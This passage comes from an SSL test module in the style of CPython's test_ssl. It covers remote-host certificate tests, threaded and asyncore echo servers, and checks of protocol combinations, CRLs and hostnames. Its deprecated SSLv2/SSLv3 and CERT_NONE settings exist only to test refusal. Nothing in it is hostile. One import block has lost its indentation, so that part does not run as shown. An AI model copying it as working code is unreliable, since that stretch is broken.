            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(cadata=pem)
            with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
                s.connect((REMOTE_HOST, 443))
                cert = s.getpeercert()
                self.assertTrue(cert)
            # same with DER
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(cadata=der)
            with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
                s.connect((REMOTE_HOST, 443))
                cert = s.getpeercert()
                self.assertTrue(cert)

    @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
    def test_makefile_close(self):
        # Issue #5238: creating a file-like object with makefile() shouldn't
        # delay closing the underlying "real socket" (here tested with its
        # file descriptor, hence skipping the test under Windows).
        with support.transient_internet(REMOTE_HOST):
            ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
            ss.connect((REMOTE_HOST, 443))
            fd = ss.fileno()
            f = ss.makefile()
            f.close()
            # The fd is still open
            os.read(fd, 0)
            # Closing the SSL socket should close the fd too
            ss.close()
            gc.collect()
            with self.assertRaises(OSError) as e:
                os.read(fd, 0)
            self.assertEqual(e.exception.errno, errno.EBADF)

    def test_non_blocking_handshake(self):
        # drive do_handshake() by hand on a non-blocking socket
        with support.transient_internet(REMOTE_HOST):
            s = socket.socket(socket.AF_INET)
            s.connect((REMOTE_HOST, 443))
            s.setblocking(False)
            s = ssl.wrap_socket(s,
                                cert_reqs=ssl.CERT_NONE,
                                do_handshake_on_connect=False)
            count = 0
            while True:
                try:
                    count += 1
                    s.do_handshake()
                    break
                except ssl.SSLWantReadError:
                    select.select([s], [], [])
                except ssl.SSLWantWriteError:
                    select.select([], [s], [])
            s.close()
            if support.verbose:
                sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)

    def test_get_server_certificate(self):
        def _test_get_server_certificate(host, port, cert=None):
            with support.transient_internet(host):
                pem = ssl.get_server_certificate((host, port))
                if not pem:
                    self.fail("No server certificate on %s:%s!" % (host, port))

                try:
                    # verifying against an unrelated cert must fail
                    pem = ssl.get_server_certificate((host, port),
                                                     ca_certs=CERTFILE)
                except ssl.SSLError as x:
                    #should fail
                    if support.verbose:
                        sys.stdout.write("%s\n" % x)
                else:
                    self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))

                pem = ssl.get_server_certificate((host, port),
                                                 ca_certs=cert)
                if not pem:
                    self.fail("No server certificate on %s:%s!" % (host, port))
                if support.verbose:
                    sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))

        _test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
        if support.IPV6_ENABLED:
            _test_get_server_certificate('ipv6.google.com', 443)

    def test_ciphers(self):
        remote = (REMOTE_HOST, 443)
        with support.transient_internet(remote[0]):
            with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
                                         cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
                s.connect(remote)
            with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
                                         cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
                s.connect(remote)
            # Error checking can happen at instantiation or when connecting
            with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
                with closing(socket.socket(socket.AF_INET)) as sock:
                    s = ssl.wrap_socket(sock,
                                        cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
                    s.connect(remote)

    def test_get_ca_certs_capath(self):
        # capath certs are loaded on request
        with support.transient_internet(REMOTE_HOST):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=CAPATH)
            # nothing loaded yet...
            self.assertEqual(ctx.get_ca_certs(), [])
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
            # ...the handshake pulled the CA cert in from capath
            self.assertEqual(len(ctx.get_ca_certs()), 1)

    @needs_sni
    def test_context_setget(self):
        # Check that the context of a connected socket can be replaced.
        with support.transient_internet(REMOTE_HOST):
            ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = socket.socket(socket.AF_INET)
            with closing(ctx1.wrap_socket(s)) as ss:
                ss.connect((REMOTE_HOST, 443))
                self.assertIs(ss.context, ctx1)
                self.assertIs(ss._sslobj.context, ctx1)
                ss.context = ctx2
                self.assertIs(ss.context, ctx2)
                self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
    """Threaded echo server used by the SSL tests: accepts one connection
    at a time, echoes lowercased data back, and understands a few control
    words (b'over', b'STARTTLS', b'ENDTLS', b'CB tls-unique') so client
    tests can drive it through different states."""

    class ConnectionHandler(threading.Thread):

        """A mildly complicated class, because we want it to work both
        with and without the SSL wrapper around the socket connection, so
        that we can test the STARTTLS functionality."""

        def __init__(self, server, connsock, addr):
            self.server = server
            self.running = False
            self.sock = connsock
            self.addr = addr
            self.sock.setblocking(1)
            # self.sslconn stays None while the connection is plaintext
            self.sslconn = None
            threading.Thread.__init__(self)
            self.daemon = True

        def wrap_conn(self):
            # Wrap self.sock with TLS; returns True on success and False
            # (after recording the error) on a bad connection attempt.
            try:
                self.sslconn = self.server.context.wrap_socket(
                    self.sock, server_side=True)
                self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
                self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
            except (ssl.SSLError, socket.error, OSError) as e:
                if e.errno in (errno.ECONNRESET, errno.EPIPE, errno.ESHUTDOWN):
                    # Mimick Python 3:
                    #
                    # except (ConnectionResetError, BrokenPipeError):
                    #
                    # We treat ConnectionResetError as though it were an
                    # SSLError - OpenSSL on Ubuntu abruptly closes the
                    # connection when asked to use an unsupported protocol.
                    #
                    # BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
                    # tries to send session tickets after handshake.
                    # https://github.com/openssl/openssl/issues/6342
                    self.server.conn_errors.append(str(e))
                    if self.server.chatty:
                        handle_error(
                            "\n server: bad connection attempt from "
                            + repr(self.addr) + ":\n")
                    self.running = False
                    self.close()
                    return False
                else:
                    # OSError may occur with wrong protocols, e.g. both
                    # sides use PROTOCOL_TLS_SERVER.
                    #
                    # XXX Various errors can have happened here, for example
                    # a mismatching protocol version, an invalid certificate,
                    # or a low-level bug. This should be made more discriminating.
                    if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
                        raise
                    self.server.conn_errors.append(e)
                    if self.server.chatty:
                        handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
                    self.running = False
                    # stop the whole server, not just this handler
                    self.server.stop()
                    self.close()
                    return False
            else:
                if self.server.context.verify_mode == ssl.CERT_REQUIRED:
                    cert = self.sslconn.getpeercert()
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
                    cert_binary = self.sslconn.getpeercert(True)
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
                cipher = self.sslconn.cipher()
                if support.verbose and self.server.chatty:
                    sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
                    sys.stdout.write(" server: selected protocol is now "
                                     + str(self.sslconn.selected_npn_protocol()) + "\n")
                return True

        def read(self):
            # read through TLS when wrapped, raw socket otherwise
            if self.sslconn:
                return self.sslconn.read()
            else:
                return self.sock.recv(1024)

        def write(self, bytes):
            if self.sslconn:
                return self.sslconn.write(bytes)
            else:
                return self.sock.send(bytes)

        def close(self):
            if self.sslconn:
                self.sslconn.close()
            else:
                self.sock.close()

        def run(self):
            # Main echo loop; dispatches on the control words the test
            # clients send, otherwise echoes the payload lowercased.
            self.running = True
            if not self.server.starttls_server:
                if not self.wrap_conn():
                    return
            while self.running:
                try:
                    msg = self.read()
                    stripped = msg.strip()
                    if not stripped:
                        # eof, so quit this handler
                        self.running = False
                        self.close()
                    elif stripped == b'over':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: client closed connection\n")
                        self.close()
                        return
                    elif (self.server.starttls_server and
                          stripped == b'STARTTLS'):
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        if not self.wrap_conn():
                            return
                    elif (self.server.starttls_server and self.sslconn
                          and stripped == b'ENDTLS'):
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        # drop back to the plain socket
                        self.sock = self.sslconn.unwrap()
                        self.sslconn = None
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: connection is now unencrypted...\n")
                    elif stripped == b'CB tls-unique':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
                        data = self.sslconn.get_channel_binding("tls-unique")
                        self.write(repr(data).encode("us-ascii") + b"\n")
                    else:
                        if (support.verbose and
                            self.server.connectionchatty):
                            ctype = (self.sslconn and "encrypted") or "unencrypted"
                            sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
                                             % (msg, ctype, msg.lower(), ctype))
                        self.write(msg.lower())
                except ssl.SSLError:
                    if self.server.chatty:
                        handle_error("Test server failure:\n")
                    self.close()
                    self.running = False
                    # normally, we'd just stop here, but for the test
                    # harness, we want to stop the server
                    self.server.stop()

    def __init__(self, certificate=None, ssl_version=None,
                 certreqs=None, cacerts=None,
                 chatty=True, connectionchatty=False, starttls_server=False,
                 npn_protocols=None, alpn_protocols=None,
                 ciphers=None, context=None):
        # either take a ready-made context or build one from the pieces
        if context:
            self.context = context
        else:
            self.context = ssl.SSLContext(ssl_version
                                          if ssl_version is not None
                                          else ssl.PROTOCOL_TLS)
            self.context.verify_mode = (certreqs if certreqs is not None
                                        else ssl.CERT_NONE)
            if cacerts:
                self.context.load_verify_locations(cacerts)
            if certificate:
                self.context.load_cert_chain(certificate)
            if npn_protocols:
                self.context.set_npn_protocols(npn_protocols)
            if alpn_protocols:
                self.context.set_alpn_protocols(alpn_protocols)
            if ciphers:
                self.context.set_ciphers(ciphers)
        self.chatty = chatty
        self.connectionchatty = connectionchatty
        self.starttls_server = starttls_server
        self.sock = socket.socket()
        self.port = support.bind_port(self.sock)
        self.flag = None
        self.active = False
        self.selected_npn_protocols = []
        self.selected_alpn_protocols = []
        self.conn_errors = []
        threading.Thread.__init__(self)
        self.daemon = True

    def __enter__(self):
        # start() stores the event in self.flag; run() sets it once the
        # server is actually listening
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        self.stop()
        self.join()

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        # short accept timeout so stop() is noticed promptly
        self.sock.settimeout(0.05)
        self.sock.listen(5)
        self.active = True
        if self.flag:
            # signal an event
            self.flag.set()
        while self.active:
            try:
                newconn, connaddr = self.sock.accept()
                if support.verbose and self.chatty:
                    sys.stdout.write(' server: new connection from '
                                     + repr(connaddr) + '\n')
                handler = self.ConnectionHandler(self, newconn, connaddr)
                handler.start()
                handler.join()
            except socket.timeout:
                pass
            except KeyboardInterrupt:
                self.stop()
        self.sock.close()

    def stop(self):
        self.active = False
class AsyncoreEchoServer(threading.Thread):
    """Echo server built on asyncore, run in a background thread.
    NOTE: the "except socket.error, err" form below is Python 2 syntax;
    this module targets Python 2."""

    class EchoServer(asyncore.dispatcher):

        class ConnectionHandler(asyncore.dispatcher_with_send):

            def __init__(self, conn, certfile):
                # wrap first, then hand the wrapped socket to asyncore
                self.socket = ssl.wrap_socket(conn, server_side=True,
                                              certfile=certfile,
                                              do_handshake_on_connect=False)
                asyncore.dispatcher_with_send.__init__(self, self.socket)
                self._ssl_accepting = True
                self._do_ssl_handshake()

            def readable(self):
                if isinstance(self.socket, ssl.SSLSocket):
                    # drain data already buffered inside the SSL layer,
                    # which select() cannot see
                    while self.socket.pending() > 0:
                        self.handle_read_event()
                return True

            def _do_ssl_handshake(self):
                try:
                    self.socket.do_handshake()
                except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
                    # not ready yet; retried on the next event
                    return
                except ssl.SSLEOFError:
                    return self.handle_close()
                except ssl.SSLError:
                    raise
                except socket.error, err:
                    if err.args[0] == errno.ECONNABORTED:
                        return self.handle_close()
                else:
                    # handshake finished; switch to echo mode
                    self._ssl_accepting = False

            def handle_read(self):
                if self._ssl_accepting:
                    self._do_ssl_handshake()
                else:
                    data = self.recv(1024)
                    if support.verbose:
                        sys.stdout.write(" server: read %s from client\n" % repr(data))
                    if not data:
                        self.close()
                    else:
                        # echo the payload back, lowercased
                        self.send(data.lower())

            def handle_close(self):
                self.close()
                if support.verbose:
                    sys.stdout.write(" server: closed connection %s\n" % self.socket)

            def handle_error(self):
                raise

        def __init__(self, certfile):
            self.certfile = certfile
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.port = support.bind_port(sock, '')
            asyncore.dispatcher.__init__(self, sock)
            self.listen(5)

        def handle_accept(self):
            sock_obj, addr = self.accept()
            if support.verbose:
                sys.stdout.write(" server: new connection from %s:%s\n" %addr)
            self.ConnectionHandler(sock_obj, self.certfile)

        def handle_error(self):
            raise

    def __init__(self, certfile):
        self.flag = None
        self.active = False
        self.server = self.EchoServer(certfile)
        self.port = self.server.port
        threading.Thread.__init__(self)
        self.daemon = True

    def __str__(self):
        return "<%s %s>" % (self.__class__.__name__, self.server)

    def __enter__(self):
        # start() stores the event in self.flag; run() sets it on startup
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        if support.verbose:
            sys.stdout.write(" cleanup: stopping server.\n")
        self.stop()
        if support.verbose:
            sys.stdout.write(" cleanup: joining server thread.\n")
        self.join()
        if support.verbose:
            sys.stdout.write(" cleanup: successfully joined.\n")
        # make sure that ConnectionHandler is removed from socket_map
        asyncore.close_all(ignore_all=True)

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        self.active = True
        if self.flag:
            self.flag.set()
        while self.active:
            try:
                asyncore.loop(1)
            except:
                pass

    def stop(self):
        self.active = False
        self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
                       chatty=True, connectionchatty=False, sni_name=None):
    """
    Launch a server, connect a client to it and try various reads
    and writes.

    Returns a dict of facts observed about the connection (cipher,
    compression, peer cert, negotiated ALPN/NPN protocols, TLS version)
    for the caller to assert on.
    """
    stats = {}
    server = ThreadedEchoServer(context=server_context,
                                chatty=chatty,
                                connectionchatty=False)
    with server:
        with closing(client_context.wrap_socket(socket.socket(),
                                                server_hostname=sni_name)) as s:
            s.connect((HOST, server.port))
            # exercise bytes, bytearray and memoryview writes alike
            for arg in [indata, bytearray(indata), memoryview(indata)]:
                if connectionchatty:
                    if support.verbose:
                        sys.stdout.write(
                            " client: sending %r...\n" % indata)
                s.write(arg)
                outdata = s.read()
                if connectionchatty:
                    if support.verbose:
                        sys.stdout.write(" client: read %r\n" % outdata)
                # the echo server replies with the lowercased payload
                if outdata != indata.lower():
                    raise AssertionError(
                        "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                        % (outdata[:20], len(outdata),
                           indata[:20].lower(), len(indata)))
            # b'over' tells the server this connection is finished
            s.write(b"over\n")
            if connectionchatty:
                if support.verbose:
                    sys.stdout.write(" client: closing connection.\n")
            # capture connection facts before the socket goes away
            stats.update({
                'compression': s.compression(),
                'cipher': s.cipher(),
                'peercert': s.getpeercert(),
                'client_alpn_protocol': s.selected_alpn_protocol(),
                'client_npn_protocol': s.selected_npn_protocol(),
                'version': s.version(),
            })
            s.close()
        # server-side negotiation results, recorded by the handler thread
        stats['server_alpn_protocols'] = server.selected_alpn_protocols
        stats['server_npn_protocols'] = server.selected_npn_protocols
    return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
                       certsreqs=None, server_options=0, client_options=0):
    """
    Try to SSL-connect using *client_protocol* to *server_protocol*.
    If *expect_success* is true, assert that the connection succeeds,
    if it's false, assert that the connection fails.
    Also, if *expect_success* is a string, assert that it is the protocol
    version actually used by the connection.

    certsreqs: ssl.CERT_* constant applied to both contexts
        (defaults to CERT_NONE).
    server_options / client_options: extra ssl.OP_* flags OR'd into the
        respective context's options.
    """
    if certsreqs is None:
        certsreqs = ssl.CERT_NONE
    # Human-readable name for the verbose trace below.
    certtype = {
        ssl.CERT_NONE: "CERT_NONE",
        ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
        ssl.CERT_REQUIRED: "CERT_REQUIRED",
    }[certsreqs]
    if support.verbose:
        formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
        sys.stdout.write(formatstr %
                         (ssl.get_protocol_name(client_protocol),
                          ssl.get_protocol_name(server_protocol),
                          certtype))
    client_context = ssl.SSLContext(client_protocol)
    client_context.options |= client_options
    server_context = ssl.SSLContext(server_protocol)
    server_context.options |= server_options
    # NOTE: we must enable "ALL" ciphers on the client, otherwise an
    # SSLv23 client will send an SSLv3 hello (rather than SSLv2)
    # starting from OpenSSL 1.0.0 (see issue #8322).
    if client_context.protocol == ssl.PROTOCOL_SSLv23:
        client_context.set_ciphers("ALL")
    for ctx in (client_context, server_context):
        ctx.verify_mode = certsreqs
        ctx.load_cert_chain(CERTFILE)
        ctx.load_verify_locations(CERTFILE)
    try:
        stats = server_params_test(client_context, server_context,
                                   chatty=False, connectionchatty=False)
    # Protocol mismatch can result in either an SSLError, or a
    # "Connection reset by peer" error.
    except ssl.SSLError:
        if expect_success:
            raise
    except socket.error as e:
        if expect_success or e.errno != errno.ECONNRESET:
            raise
    else:
        if not expect_success:
            raise AssertionError(
                "Client protocol %s succeeded with server protocol %s!"
                % (ssl.get_protocol_name(client_protocol),
                   ssl.get_protocol_name(server_protocol)))
        elif (expect_success is not True
              and expect_success != stats['version']):
            # expect_success was a version string, e.g. 'TLSv1'.
            raise AssertionError("version mismatch: expected %r, got %r"
                                 % (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
    @skip_if_broken_ubuntu_ssl
    def test_echo(self):
        """Basic test of an SSL client connecting to a server"""
        if support.verbose:
            sys.stdout.write("\n")
        # Exercise the echo round-trip once per supported protocol.
        for protocol in PROTOCOLS:
            context = ssl.SSLContext(protocol)
            context.load_cert_chain(CERTFILE)
            server_params_test(context, context,
                               chatty=True, connectionchatty=True)
    def test_getpeercert(self):
        """getpeercert() yields the peer's certificate after the handshake.

        Also checks that calling it before the handshake raises
        ValueError, and sanity-checks the certificate's subject and
        validity dates.
        """
        if support.verbose:
            sys.stdout.write("\n")
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(CERTFILE)
        context.load_cert_chain(CERTFILE)
        server = ThreadedEchoServer(context=context, chatty=False)
        with server:
            # Defer the handshake so the pre-handshake error can be
            # observed first.
            s = context.wrap_socket(socket.socket(),
                                    do_handshake_on_connect=False)
            s.connect((HOST, server.port))
            # getpeercert() raise ValueError while the handshake isn't
            # done.
            with self.assertRaises(ValueError):
                s.getpeercert()
            s.do_handshake()
            cert = s.getpeercert()
            self.assertTrue(cert, "Can't get peer certificate.")
            cipher = s.cipher()
            if support.verbose:
                sys.stdout.write(pprint.pformat(cert) + '\n')
                sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
            if 'subject' not in cert:
                self.fail("No subject field in certificate: %s." %
                          pprint.pformat(cert))
            if ((('organizationName', 'Python Software Foundation'),)
                not in cert['subject']):
                self.fail(
                    "Missing or invalid 'organizationName' field in certificate subject; "
                    "should be 'Python Software Foundation'.")
            self.assertIn('notBefore', cert)
            self.assertIn('notAfter', cert)
            # Validity window must be non-empty.
            before = ssl.cert_time_to_seconds(cert['notBefore'])
            after = ssl.cert_time_to_seconds(cert['notAfter'])
            self.assertLess(before, after)
            s.close()
    @unittest.skipUnless(have_verify_flags(),
                         "verify_flags need OpenSSL > 0.9.8")
    def test_crl_check(self):
        """VERIFY_CRL_CHECK_LEAF fails without a CRL and passes with one.

        Three connections: the default flags succeed, enabling leaf CRL
        checking without a loaded CRL fails verification, and loading
        the CA-signed CRL makes it succeed again.
        """
        if support.verbose:
            sys.stdout.write("\n")
        server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        server_context.load_cert_chain(SIGNED_CERTFILE)
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(SIGNING_CA)
        # Some OpenSSL builds set VERIFY_X509_TRUSTED_FIRST by default.
        tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
        self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
        # VERIFY_DEFAULT should pass
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with closing(context.wrap_socket(socket.socket())) as s:
                s.connect((HOST, server.port))
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")
        # VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
        context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with closing(context.wrap_socket(socket.socket())) as s:
                with self.assertRaisesRegexp(ssl.SSLError,
                                             "certificate verify failed"):
                    s.connect((HOST, server.port))
        # now load a CRL file. The CRL file is signed by the CA.
        context.load_verify_locations(CRLFILE)
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with closing(context.wrap_socket(socket.socket())) as s:
                s.connect((HOST, server.port))
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")
    def test_check_hostname(self):
        """check_hostname verifies the server name during the handshake.

        A matching server_hostname succeeds, a non-matching one raises
        CertificateError, and omitting server_hostname entirely is a
        ValueError at wrap time.
        """
        if support.verbose:
            sys.stdout.write("\n")
        server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        server_context.load_cert_chain(SIGNED_CERTFILE)
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.verify_mode = ssl.CERT_REQUIRED
        context.check_hostname = True
        context.load_verify_locations(SIGNING_CA)
        # correct hostname should verify
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with closing(context.wrap_socket(socket.socket(),
                                             server_hostname="localhost")) as s:
                s.connect((HOST, server.port))
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")
        # incorrect hostname should raise an exception
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with closing(context.wrap_socket(socket.socket(),
                                             server_hostname="invalid")) as s:
                with self.assertRaisesRegexp(ssl.CertificateError,
                                             "hostname 'invalid' doesn't match u?'localhost'"):
                    s.connect((HOST, server.port))
        # missing server_hostname arg should cause an exception, too
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with closing(socket.socket()) as s:
                with self.assertRaisesRegexp(ValueError,
                                             "check_hostname requires server_hostname"):
                    context.wrap_socket(s)
    def test_wrong_cert(self):
        """Connecting when the server rejects the client's certificate

        Launch a server with CERT_REQUIRED, and check that trying to
        connect to it with a wrong client certificate fails.
        """
        # A self-signed cert the server's CA did not issue.
        certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
                                   "keycert.pem")
        server = ThreadedEchoServer(SIGNED_CERTFILE,
                                    certreqs=ssl.CERT_REQUIRED,
                                    cacerts=SIGNING_CA, chatty=False,
                                    connectionchatty=False)
        with server, \
                closing(socket.socket()) as sock, \
                closing(ssl.wrap_socket(sock,
                                    certfile=certfile,
                                    ssl_version=ssl.PROTOCOL_TLSv1)) as s:
            try:
                # Expect either an SSL error about the server rejecting
                # the connection, or a low-level connection reset (which
                # sometimes happens on Windows)
                s.connect((HOST, server.port))
            except ssl.SSLError as e:
                if support.verbose:
                    sys.stdout.write("\nSSLError is %r\n" % e)
            except socket.error as e:
                if e.errno != errno.ECONNRESET:
                    raise
                if support.verbose:
                    sys.stdout.write("\nsocket.error is %r\n" % e)
            else:
                self.fail("Use of invalid cert should have failed!")
    def test_rude_shutdown(self):
        """A brutal shutdown of an SSL server should raise an OSError
        in the client when attempting handshake.
        """
        # Events synchronize the listener thread with the client below.
        listener_ready = threading.Event()
        listener_gone = threading.Event()

        s = socket.socket()
        port = support.bind_port(s, HOST)

        # `listener` runs in a thread.  It sits in an accept() until
        # the main thread connects.  Then it rudely closes the socket,
        # and sets Event `listener_gone` to let the main thread know
        # the socket is gone.
        def listener():
            s.listen(5)
            listener_ready.set()
            newsock, addr = s.accept()
            newsock.close()
            s.close()
            listener_gone.set()

        def connector():
            listener_ready.wait()
            with closing(socket.socket()) as c:
                c.connect((HOST, port))
                # Only start the handshake once the TCP peer is gone.
                listener_gone.wait()
                try:
                    ssl_sock = ssl.wrap_socket(c)
                except socket.error:
                    pass
                else:
                    self.fail('connecting to closed SSL socket should have failed')

        t = threading.Thread(target=listener)
        t.start()
        try:
            connector()
        finally:
            t.join()
    @skip_if_broken_ubuntu_ssl
    @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
                         "OpenSSL is compiled without SSLv2 support")
    def test_protocol_sslv2(self):
        """Connecting to an SSLv2 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        # SSLv2 clients should connect; anything newer must be refused.
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
        # SSLv23 client with specific SSL options
        if no_sslv2_implies_sslv3_hello():
            # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
            try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                               client_options=ssl.OP_NO_SSLv2)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_TLSv1)
    @skip_if_broken_ubuntu_ssl
    def test_protocol_sslv23(self):
        """Connecting to an SSLv23 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try:
                try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
            except socket.error as x:
                # this fails on some older versions of OpenSSL (0.9.7l, for instance)
                if support.verbose:
                    sys.stdout.write(
                        " SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
                        % str(x))
        # An SSLv23 (auto-negotiating) server must refuse plain SSLv3
        # clients but accept SSLv23 and TLSv1 ones, at every cert level.
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')

        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)

        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)

        # Server with specific SSL options
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
                               server_options=ssl.OP_NO_SSLv3)
        # Will choose TLSv1
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
                           server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
                           server_options=ssl.OP_NO_TLSv1)
    @skip_if_broken_ubuntu_ssl
    @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
                         "OpenSSL is compiled without SSLv3 support")
    def test_protocol_sslv3(self):
        """Connecting to an SSLv3 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        # Only pure SSLv3 clients should succeed against an SSLv3 server.
